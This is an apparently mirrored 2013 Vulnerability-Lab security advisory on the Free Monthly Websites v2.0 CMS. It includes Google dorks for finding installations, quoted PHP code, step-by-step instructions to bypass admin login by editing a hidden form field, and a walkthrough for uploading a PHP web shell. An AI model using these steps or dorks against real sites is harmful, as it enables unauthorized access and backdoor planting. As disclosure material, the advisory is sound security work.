240 lines
9.1 KiB
Text
Executable file
240 lines
9.1 KiB
Text
Executable file
Title:
|
|
======
|
|
Free Monthly Websites v2.0 - Multiple Web Vulnerabilities
|
|
|
|
|
|
Date:
|
|
=====
|
|
2013-02-04
|
|
|
|
|
|
References:
|
|
===========
|
|
http://www.vulnerability-lab.com/get_content.php?id=851
|
|
|
|
|
|
VL-ID:
|
|
=====
|
|
851
|
|
|
|
|
|
Common Vulnerability Scoring System:
|
|
====================================
|
|
8.5
|
|
|
|
|
|
Introduction:
|
|
=============
|
|
Free Monthly Websites 2.0 is here and you no longer have to worry about editing complicated HTML code as we have
|
|
taken care of that for you, and you no longer have to worry about anything to do with website design as we have taken
|
|
care of that for you too, adding your Google AdSense Publisher code, taken care of, ClickBank! All done for you,
|
|
here\\\'s how it works. Upload Your Site To Your Domain (this can be done for you). Login To Your Admin Control Panel.
|
|
Personalize Your Website (takes just 5 minutes).
|
|
|
|
(Copy of the Vendor Homepage: http://www.freemonthlywebsites2.com/ )
|
|
|
|
|
|
Abstract:
|
|
=========
|
|
The independent Vulnerability Laboratory researcher (x-Cisadane) discovered multiple web vulnerabilities in the Free Monthly Websites v2.0 CMS.
|
|
|
|
|
|
Report-Timeline:
|
|
================
|
|
2013-02-04: Public Disclosure
|
|
|
|
|
|
Status:
|
|
========
|
|
Published
|
|
|
|
|
|
Exploitation-Technique:
|
|
=======================
|
|
Defensiv
|
|
|
|
|
|
Severity:
|
|
=========
|
|
Critical
|
|
|
|
|
|
Details:
|
|
========
|
|
Multiple web vulnerabilities are detected in the Free Monthly Websites v2.0 Content Management System.
|
|
The first bypass vulnerability allows attackers to bypass the system web application auth of the admin login.
|
|
The secound vulnerability allows to upload for example webshells and access them after upload via unauthorized web access.
|
|
|
|
Vulnerable Module(s):
|
|
[+] Login Auth (Admin) - Bypass
|
|
[+] Upload File - Unauthorized File Upload & Access
|
|
|
|
|
|
Proof of Concept:
|
|
=================
|
|
The vulnerabilities can be exploited by remote attackers without required user interaction or privileged application user account.
|
|
For demonstration or reproduce ...
|
|
|
|
Dork(s):
|
|
inurl:/index_ebay.php
|
|
"Powered by: Resell Rights Fortune"
|
|
"Generating Traffic to Your Site with Keyword Based Articles"
|
|
Powered By: Free Monthly Websites 2.0
|
|
|
|
|
|
[ 1 ] Admin Login Bypass
|
|
|
|
Vulnerable page http://target.com/[path]/admin/index.php
|
|
Line
|
|
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
|
|
41 <input type="hidden" name="do_type" value="admin_settings_read">
|
|
|
|
Vulnerable page http://target.com/[path]/admin/login.php
|
|
Line
|
|
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
|
|
41 <input type="hidden" name="do_type" value="admin_settings_read">
|
|
|
|
Vulnerable page http://target.com/[path]/admin/file_io.php
|
|
|
|
Line
|
|
14 if($_REQUEST[do_type]=="admin_settings_read")
|
|
15 {
|
|
16 $filename="settings/admin_settings.txt";
|
|
17
|
|
18 if(!$handle = fopen($filename, 'r'))
|
|
19 {
|
|
20 echo "Cannot open file ($filename)";
|
|
21 exit;
|
|
22 }
|
|
23 $contents = fread($handle, filesize($filename));
|
|
24 fclose($handle);
|
|
25 $argument_arr=explode("#_1_#",$contents);
|
|
26
|
|
27 if($argument_arr[0]==$_REQUEST[username] && $argument_arr[1]==$_REQUEST[pass])
|
|
28 {
|
|
29 $_SESSION[logged_in]=true;
|
|
30 header("location:welcome.php");
|
|
|
|
Based at line 16 we know that Admin Username and Password store in admin_settings.txt NOT on Database!
|
|
So When we login into Admin Panel, file_io.php will Read Valid Username and Password from admin_settings.txt
|
|
If you do a direct access to the file admin_settings.txt, The results is
|
|
|
|
403 Permission Denied
|
|
You do not have permission for this request /admin/settings/admin_settings.txt
|
|
Picture: http://i48.tinypic.com/2gvlwt4.png
|
|
|
|
|
|
So... How to Bypass Admin Login Page?
|
|
1st. Open the Admin Login Page : http://target.com/[path]/admin/index.php
|
|
|
|
2nd. Inspect Element on the login Form.
|
|
Picture: http://i47.tinypic.com/2r5ddp1.png
|
|
|
|
3rd. Change from
|
|
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
|
|
<input type="hidden" name="do_type" value="admin_settings_read">
|
|
|
|
CHANGE TO
|
|
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
|
|
<input type="text" name="do_type" value="admin_settings_write">
|
|
Then press ENTER (please see pic).
|
|
Pic : http://i49.tinypic.com/351z3ib.png
|
|
|
|
4th. You will see A Login Failed Page : >> You need to login in to access that page <<
|
|
Picture: http://i50.tinypic.com/33ws8jb.png
|
|
Never Mind About that, just click 'Login Button' and VOILA you get and Admin Access!
|
|
Picture: http://i45.tinypic.com/jzwpea.png
|
|
----------------------------------------
|
|
[ 2 ] Upload PHP Backdoor or PHP Shell
|
|
|
|
This vulnerability works on PREMIUM VERSION of Free Monthly Websites 2.0
|
|
|
|
So... How to Upload Backdoor (PHP Shell)?
|
|
|
|
1st. Go to Add/Remove Navigation Page.
|
|
http://target.com/[path]/admin/add_main_pages.php
|
|
|
|
2nd. Enter a Name For Your New Navigation Page That You Wish To Add: dwi.php
|
|
And click Add New Navigation Page.
|
|
Picture: http://i45.tinypic.com/vigzsp.png
|
|
|
|
3rd. Still at the same page, scroll down the page until you see this section : Sort Your Page Buttons/Links.
|
|
Pic : http://i46.tinypic.com/1040oxg.png
|
|
Change FROM dwi.php.html TO /dwi.php then Click Sort Navigation Pages.
|
|
Picture: http://i49.tinypic.com/24ec1l0.jpg
|
|
|
|
4th. Go to Edit Navigation Page.
|
|
http://www.massmoneywebsites.com/admin/edit_main_pages.php
|
|
Please Select a Page To Edit: dwi.php.html <--- Select that page.
|
|
|
|
5th. Inspect element on dwi.php.html
|
|
Pic : http://i50.tinypic.com/29pq1ix.png
|
|
Change FROM <option value="dwi.php.html" selected="">dwi.php.html</option>
|
|
To <option value="dwi.php" selected="">dwi.php</option>
|
|
Picture: http://i47.tinypic.com/wtb0j6.png
|
|
|
|
6th. Enter A Page Title As You Would Like It To Be Seen. Fill with dwi.php
|
|
URL For This Page: main_pages/dwi.php
|
|
Use the 'URL For This Page' field above: [Tick]
|
|
Display This Page in Left Vertical Site Navigation: [Tick]
|
|
Display This Page in Top Horizontal Site Navigation Buttons: [Tick]
|
|
Picture: http://i46.tinypic.com/1zebnle.png
|
|
|
|
7th. Still at the same page, scroll down the page until you see this section : Enter Content For Your Page:
|
|
Click SOURCE button
|
|
Press Enter Twice at the First Line then Paste your PHP Backdoor/PHP Shell below.
|
|
And Press Enter Twice at the Last Line.
|
|
*Please see 2 Pictures below If you dunno Understand :p
|
|
Picture 1 : http://i49.tinypic.com/1zlzxq0.png
|
|
Picture 2 : http://i48.tinypic.com/291kc9h.png
|
|
|
|
If you wanna do this, please remove your backdoor password.
|
|
Click Save edited navigation page.
|
|
|
|
8th. After this message >> Data saved successfully << Appeared, Visit the Home Page and you will see the Backdoor Page
|
|
Picture : http://i49.tinypic.com/4rt1g4.png
|
|
|
|
|
|
Risk:
|
|
=====
|
|
The security risk of the unauthorized file upload vulnerability via auth bypass is estimated as critical.
|
|
|
|
|
|
Credits:
|
|
========
|
|
X-Cisadane - (stefanus_dp@ymail.com)
|
|
Greetz 2: X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Ngobas
|
|
|
|
|
|
Disclaimer:
|
|
===========
|
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
|
|
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
|
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
|
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
|
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
|
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
|
or trade with fraud/stolen material.
|
|
|
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
|
|
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
|
|
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
|
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
|
|
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
|
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
|
|
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
|
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
|
|
|
|
Copyright ? 2012 | Vulnerability Laboratory
|
|
|
|
|
|
|
|
--
|
|
VULNERABILITY RESEARCH LABORATORY
|
|
LABORATORY RESEARCH TEAM
|
|
CONTACT: research@vulnerability-lab.com
|
|
|
|
|